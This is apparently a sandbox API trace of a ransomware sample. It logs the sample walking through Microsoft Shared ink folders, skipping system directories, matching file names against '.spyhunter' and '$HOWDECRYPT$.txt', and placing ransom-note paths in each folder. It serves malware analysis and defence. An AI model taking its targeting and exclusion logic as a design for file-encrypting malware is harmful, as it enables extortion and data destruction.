[0086.849] lstrlenW (lpString="System Volume Information") returned 25 [0086.849] wnsprintfW (in: pszDest=0x373808, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml") returned 91 [0086.849] StrStrIW (lpFirst="baseAltGr_rtl.xml", lpSrch=".spyhunter") returned 0x0 [0086.849] lstrcmpW (lpString1="baseAltGr_rtl.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.849] lstrcmpW (lpString1="baseAltGr_rtl.xml", lpString2="_uninstalling_.png") returned 1 [0086.849] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml") returned 91 [0086.849] GetProcessHeap () returned 0x2c0000 [0086.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf8) returned 0x330578 [0086.849] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x888) returned 0x3867e8 [0086.849] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0086.849] lstrcmpiW (lpString1="base_altgr.xml", lpString2="Windows") returned -1 [0086.849] lstrlenW (lpString="Windows") returned 7 [0086.849] lstrcmpiW (lpString1="base_altgr.xml", lpString2="$Recycle.bin") returned 1 [0086.849] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.850] lstrcmpiW (lpString1="base_altgr.xml", lpString2="System Volume Information") returned -1 [0086.850] lstrlenW (lpString="System Volume Information") returned 25 [0086.850] wnsprintfW (in: pszDest=0x373808, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 88 [0086.850] StrStrIW (lpFirst="base_altgr.xml", lpSrch=".spyhunter") returned 0x0 [0086.850] lstrcmpW (lpString1="base_altgr.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.850] lstrcmpW (lpString1="base_altgr.xml", lpString2="_uninstalling_.png") returned 1 [0086.850] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 88 [0086.850] GetProcessHeap () returned 0x2c0000 [0086.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf2) returned 0x330678 [0086.850] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x890) returned 0x3867e8 [0086.850] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0086.850] lstrcmpiW (lpString1="base_ca.xml", lpString2="Windows") returned -1 [0086.850] lstrlenW (lpString="Windows") returned 7 [0086.850] lstrcmpiW (lpString1="base_ca.xml", lpString2="$Recycle.bin") returned 1 [0086.850] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.850] lstrcmpiW (lpString1="base_ca.xml", lpString2="System Volume Information") returned -1 [0086.850] lstrlenW (lpString="System Volume Information") returned 25 [0086.850] wnsprintfW (in: pszDest=0x373808, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml") returned 85 [0086.850] StrStrIW (lpFirst="base_ca.xml", lpSrch=".spyhunter") returned 0x0 [0086.850] lstrcmpW (lpString1="base_ca.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.850] lstrcmpW (lpString1="base_ca.xml", lpString2="_uninstalling_.png") returned 1 [0086.850] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml") returned 85 [0086.850] GetProcessHeap () returned 0x2c0000 [0086.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xec) returned 0x370da0 [0086.850] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x898) returned 0x3867e8 [0086.850] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0086.850] lstrcmpiW (lpString1="base_heb.xml", lpString2="Windows") returned -1 [0086.850] lstrlenW (lpString="Windows") returned 7 [0086.850] lstrcmpiW (lpString1="base_heb.xml", lpString2="$Recycle.bin") returned 1 [0086.850] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.850] lstrcmpiW (lpString1="base_heb.xml", lpString2="System Volume Information") returned -1 [0086.850] lstrlenW (lpString="System Volume Information") returned 25 [0086.850] wnsprintfW (in: pszDest=0x373808, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml") returned 86 [0086.850] StrStrIW (lpFirst="base_heb.xml", lpSrch=".spyhunter") returned 0x0 [0086.850] lstrcmpW (lpString1="base_heb.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.850] lstrcmpW (lpString1="base_heb.xml", lpString2="_uninstalling_.png") returned 1 [0086.851] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml") returned 86 [0086.851] GetProcessHeap () returned 0x2c0000 [0086.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xee) returned 0x370e98 [0086.851] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x8a0) returned 0x3867e8 [0086.851] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0086.851] lstrcmpiW (lpString1="base_jpn.xml", lpString2="Windows") returned -1 [0086.851] lstrlenW (lpString="Windows") returned 7 [0086.851] lstrcmpiW (lpString1="base_jpn.xml", lpString2="$Recycle.bin") returned 1 [0086.851] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.851] lstrcmpiW (lpString1="base_jpn.xml", lpString2="System Volume Information") returned -1 [0086.851] lstrlenW (lpString="System Volume Information") returned 25 [0086.851] wnsprintfW (in: pszDest=0x373808, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml") returned 86 [0086.851] StrStrIW (lpFirst="base_jpn.xml", lpSrch=".spyhunter") returned 0x0 [0086.851] lstrcmpW (lpString1="base_jpn.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.851] lstrcmpW (lpString1="base_jpn.xml", lpString2="_uninstalling_.png") returned 1 [0086.851] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml") returned 86 [0086.851] GetProcessHeap () returned 0x2c0000 [0086.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xee) returned 0x354050 [0086.851] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x8a8) returned 0x3867e8 [0086.851] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0086.851] lstrcmpiW (lpString1="base_kor.xml", lpString2="Windows") returned -1 [0086.851] lstrlenW (lpString="Windows") returned 7 [0086.851] lstrcmpiW (lpString1="base_kor.xml", lpString2="$Recycle.bin") returned 1 [0086.851] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.851] lstrcmpiW (lpString1="base_kor.xml", lpString2="System Volume Information") returned -1 [0086.851] lstrlenW (lpString="System Volume Information") returned 25 [0086.851] wnsprintfW (in: pszDest=0x373808, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml") returned 86 [0086.851] StrStrIW (lpFirst="base_kor.xml", lpSrch=".spyhunter") returned 0x0 [0086.851] lstrcmpW (lpString1="base_kor.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.851] lstrcmpW (lpString1="base_kor.xml", lpString2="_uninstalling_.png") returned 1 [0086.851] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml") returned 86 [0086.851] GetProcessHeap () returned 0x2c0000 [0086.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xee) returned 0x354148 [0086.851] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x8b0) returned 0x3867e8 [0086.852] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0086.852] lstrcmpiW (lpString1="base_rtl.xml", lpString2="Windows") returned -1 [0086.852] lstrlenW (lpString="Windows") returned 7 [0086.852] lstrcmpiW (lpString1="base_rtl.xml", lpString2="$Recycle.bin") returned 1 [0086.852] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.852] lstrcmpiW (lpString1="base_rtl.xml", lpString2="System Volume Information") returned -1 [0086.852] lstrlenW (lpString="System Volume Information") returned 25 [0086.852] wnsprintfW (in: pszDest=0x373808, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml") returned 86 [0086.852] StrStrIW (lpFirst="base_rtl.xml", lpSrch=".spyhunter") returned 0x0 [0086.852] lstrcmpW (lpString1="base_rtl.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.852] lstrcmpW (lpString1="base_rtl.xml", lpString2="_uninstalling_.png") returned 1 [0086.852] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml") returned 86 [0086.852] GetProcessHeap () returned 0x2c0000 [0086.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xee) returned 0x354240 [0086.852] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x8b8) returned 0x3867e8 [0086.852] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0086.852] lstrcmpiW (lpString1="ja-jp.xml", lpString2="Windows") returned -1 [0086.852] lstrlenW (lpString="Windows") returned 7 [0086.852] lstrcmpiW (lpString1="ja-jp.xml", lpString2="$Recycle.bin") returned 1 [0086.852] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.852] lstrcmpiW (lpString1="ja-jp.xml", lpString2="System Volume Information") returned -1 [0086.852] lstrlenW (lpString="System Volume Information") returned 25 [0086.852] wnsprintfW (in: pszDest=0x373808, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml") returned 83 [0086.852] StrStrIW (lpFirst="ja-jp.xml", lpSrch=".spyhunter") returned 0x0 [0086.852] lstrcmpW (lpString1="ja-jp.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.852] lstrcmpW (lpString1="ja-jp.xml", lpString2="_uninstalling_.png") returned 1 [0086.852] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml") returned 83 [0086.852] GetProcessHeap () returned 0x2c0000 [0086.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe8) returned 0x328cd8 [0086.852] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x8c0) returned 0x3867e8 [0086.852] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0086.852] lstrcmpiW (lpString1="ko-kr.xml", lpString2="Windows") returned -1 [0086.852] lstrlenW (lpString="Windows") returned 7 [0086.852] lstrcmpiW (lpString1="ko-kr.xml", lpString2="$Recycle.bin") returned 1 [0086.852] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.853] lstrcmpiW (lpString1="ko-kr.xml", lpString2="System Volume Information") returned -1 [0086.853] lstrlenW (lpString="System Volume Information") returned 25 [0086.853] wnsprintfW (in: pszDest=0x373808, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml") returned 83 [0086.853] StrStrIW (lpFirst="ko-kr.xml", lpSrch=".spyhunter") returned 0x0 [0086.853] lstrcmpW (lpString1="ko-kr.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.853] lstrcmpW (lpString1="ko-kr.xml", lpString2="_uninstalling_.png") returned 1 [0086.853] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml") returned 83 [0086.853] GetProcessHeap () returned 0x2c0000 [0086.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe8) returned 0x328dc8 [0086.853] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x8c8) returned 0x3867e8 [0086.853] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0086.853] lstrcmpiW (lpString1="zh-changjei.xml", lpString2="Windows") returned 1 [0086.853] lstrlenW (lpString="Windows") returned 7 [0086.853] lstrcmpiW (lpString1="zh-changjei.xml", lpString2="$Recycle.bin") returned 1 [0086.853] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.853] lstrcmpiW (lpString1="zh-changjei.xml", lpString2="System Volume Information") returned 1 [0086.853] lstrlenW (lpString="System Volume Information") returned 25 [0086.853] wnsprintfW (in: pszDest=0x373808, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml") returned 89 [0086.853] StrStrIW (lpFirst="zh-changjei.xml", lpSrch=".spyhunter") returned 0x0 [0086.853] lstrcmpW (lpString1="zh-changjei.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.853] lstrcmpW (lpString1="zh-changjei.xml", lpString2="_uninstalling_.png") returned 1 [0086.853] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml") returned 89 [0086.853] GetProcessHeap () returned 0x2c0000 [0086.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf4) returned 0x370f90 [0086.853] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x8d0) returned 0x3867e8 [0086.854] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0086.854] lstrcmpiW (lpString1="zh-dayi.xml", lpString2="Windows") returned 1 [0086.854] lstrlenW (lpString="Windows") returned 7 [0086.854] lstrcmpiW (lpString1="zh-dayi.xml", lpString2="$Recycle.bin") returned 1 [0086.854] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.854] lstrcmpiW (lpString1="zh-dayi.xml", lpString2="System Volume Information") returned 1 [0086.854] lstrlenW (lpString="System Volume Information") returned 25 [0086.854] wnsprintfW (in: pszDest=0x373808, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml") returned 85 [0086.854] StrStrIW (lpFirst="zh-dayi.xml", lpSrch=".spyhunter") returned 0x0 [0086.854] lstrcmpW (lpString1="zh-dayi.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.854] lstrcmpW (lpString1="zh-dayi.xml", lpString2="_uninstalling_.png") returned 1 [0086.854] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml") returned 85 [0086.854] GetProcessHeap () returned 0x2c0000 [0086.854] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xec) returned 0x354338 [0086.854] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x8d8) returned 0x3867e8 [0086.854] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0086.854] lstrcmpiW (lpString1="zh-phonetic.xml", lpString2="Windows") returned 1 [0086.854] lstrlenW (lpString="Windows") returned 7 [0086.855] lstrcmpiW (lpString1="zh-phonetic.xml", lpString2="$Recycle.bin") returned 1 [0086.855] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.855] lstrcmpiW (lpString1="zh-phonetic.xml", lpString2="System Volume Information") returned 1 [0086.855] lstrlenW (lpString="System Volume Information") returned 25 [0086.855] wnsprintfW (in: pszDest=0x373808, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml") returned 89 [0086.855] StrStrIW (lpFirst="zh-phonetic.xml", lpSrch=".spyhunter") returned 0x0 [0086.855] lstrcmpW (lpString1="zh-phonetic.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.855] lstrcmpW (lpString1="zh-phonetic.xml", lpString2="_uninstalling_.png") returned 1 [0086.855] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml") returned 89 [0086.855] GetProcessHeap () returned 0x2c0000 [0086.855] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf4) returned 0x383850 [0086.855] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x8e0) returned 0x3867e8 [0086.855] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0 [0086.855] FindClose (in: hFindFile=0x335fe0 | out: hFindFile=0x335fe0) returned 1 [0086.856] wnsprintfW (in: pszDest=0x373808, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\$HOWDECRYPT$.txt") returned 90 [0086.856] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\$HOWDECRYPT$.txt") returned 90 [0086.856] GetProcessHeap () returned 0x2c0000 [0086.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf6) returned 0x383950 [0086.856] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x8e8) returned 0x3867e8 [0086.857] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.857] lstrcmpiW (lpString1="main.xml", lpString2="Windows") returned -1 [0086.857] lstrlenW (lpString="Windows") returned 7 [0086.857] lstrcmpiW (lpString1="main.xml", lpString2="$Recycle.bin") returned 1 [0086.857] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.858] lstrcmpiW (lpString1="main.xml", lpString2="System Volume Information") returned -1 [0086.858] lstrlenW (lpString="System Volume Information") returned 25 [0086.858] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml") returned 77 [0086.858] StrStrIW (lpFirst="main.xml", lpSrch=".spyhunter") returned 0x0 [0086.858] lstrcmpW (lpString1="main.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.858] lstrcmpW (lpString1="main.xml", lpString2="_uninstalling_.png") returned 1 [0086.858] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml") returned 77 [0086.858] GetProcessHeap () returned 0x2c0000 [0086.858] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x372870 [0086.858] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x8f0) returned 0x3867e8 [0086.859] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.859] lstrcmpiW (lpString1="numbers", lpString2="Windows") returned -1 [0086.859] lstrlenW (lpString="Windows") returned 7 [0086.859] lstrcmpiW (lpString1="numbers", lpString2="$Recycle.bin") returned 1 [0086.859] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.859] lstrcmpiW (lpString1="numbers", lpString2="System Volume Information") returned -1 [0086.859] lstrlenW (lpString="System Volume Information") returned 25 [0086.859] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers") returned 76 [0086.859] lstrcmpW (lpString1="numbers", lpString2=".") returned 1 [0086.859] lstrcmpW (lpString1="numbers", lpString2="..") returned 1 [0086.859] GetProcessHeap () returned 0x2c0000 [0086.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x373808 [0086.860] wnsprintfW (in: pszDest=0x373808, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\*") returned 78 [0086.860] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\*", lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0x335fe0 [0086.860] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.860] lstrlenW (lpString="Windows") returned 7 [0086.860] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.860] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.860] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.860] lstrlenW (lpString="System Volume Information") returned 25 [0086.860] wnsprintfW (in: pszDest=0x373808, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\.") returned 78 [0086.860] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.860] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0086.860] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.860] lstrlenW (lpString="Windows") returned 7 [0086.860] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.860] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.860] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.860] lstrlenW (lpString="System Volume Information") returned 25 [0086.860] wnsprintfW (in: pszDest=0x373808, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\..") returned 79 [0086.860] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.860] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.860] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0086.860] lstrcmpiW (lpString1="numbase.xml", lpString2="Windows") returned -1 [0086.860] lstrlenW (lpString="Windows") returned 7 [0086.860] lstrcmpiW (lpString1="numbase.xml", lpString2="$Recycle.bin") returned 1 [0086.860] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.860] lstrcmpiW (lpString1="numbase.xml", lpString2="System Volume Information") returned -1 [0086.861] lstrlenW (lpString="System Volume Information") returned 25 [0086.861] wnsprintfW (in: pszDest=0x373808, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml") returned 88 [0086.861] StrStrIW (lpFirst="numbase.xml", lpSrch=".spyhunter") returned 0x0 [0086.861] lstrcmpW (lpString1="numbase.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.861] lstrcmpW (lpString1="numbase.xml", lpString2="_uninstalling_.png") returned 1 [0086.861] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml") returned 88 [0086.861] GetProcessHeap () returned 0x2c0000 [0086.861] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf2) returned 0x383a50 [0086.861] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x8f8) returned 0x3867e8 [0086.861] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0 [0086.861] FindClose (in: hFindFile=0x335fe0 | out: hFindFile=0x335fe0) returned 1 [0086.861] wnsprintfW (in: pszDest=0x373808, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\$HOWDECRYPT$.txt") returned 93 [0086.861] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\$HOWDECRYPT$.txt") returned 93 [0086.861] GetProcessHeap () returned 0x2c0000 [0086.861] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xfc) returned 0x383b50 [0086.861] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x900) returned 0x3867e8 [0086.861] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.861] lstrcmpiW (lpString1="numbers.xml", lpString2="Windows") returned -1 [0086.861] lstrlenW (lpString="Windows") returned 7 [0086.861] lstrcmpiW (lpString1="numbers.xml", lpString2="$Recycle.bin") returned 1 [0086.861] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.861] lstrcmpiW (lpString1="numbers.xml", lpString2="System Volume Information") returned -1 [0086.861] lstrlenW (lpString="System Volume Information") returned 25 [0086.861] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml") returned 80 [0086.861] StrStrIW (lpFirst="numbers.xml", lpSrch=".spyhunter") returned 0x0 [0086.861] lstrcmpW (lpString1="numbers.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.861] lstrcmpW (lpString1="numbers.xml", lpString2="_uninstalling_.png") returned 1 [0086.861] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml") returned 80 [0086.861] GetProcessHeap () returned 0x2c0000 [0086.861] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe2) returned 0x328eb8 [0086.861] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x908) returned 0x3867e8 [0086.862] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.862] lstrcmpiW (lpString1="oskmenu", lpString2="Windows") returned -1 [0086.862] lstrlenW (lpString="Windows") returned 7 [0086.862] lstrcmpiW (lpString1="oskmenu", lpString2="$Recycle.bin") returned 1 [0086.862] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.862] lstrcmpiW (lpString1="oskmenu", lpString2="System Volume Information") returned -1 [0086.862] lstrlenW (lpString="System Volume Information") returned 25 [0086.862] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu") returned 76 [0086.862] lstrcmpW (lpString1="oskmenu", lpString2=".") returned 1 [0086.862] lstrcmpW (lpString1="oskmenu", lpString2="..") returned 1 [0086.862] GetProcessHeap () returned 0x2c0000 [0086.862] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x373808 [0086.862] wnsprintfW (in: pszDest=0x373808, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\*") returned 78 [0086.862] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\*", lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0x335fe0 [0086.877] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.877] lstrlenW (lpString="Windows") returned 7 [0086.877] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.877] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.877] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.877] lstrlenW (lpString="System Volume Information") returned 25 [0086.877] wnsprintfW (in: pszDest=0x373808, cchDest=32767, pszFmt="%s\\%s" | out: 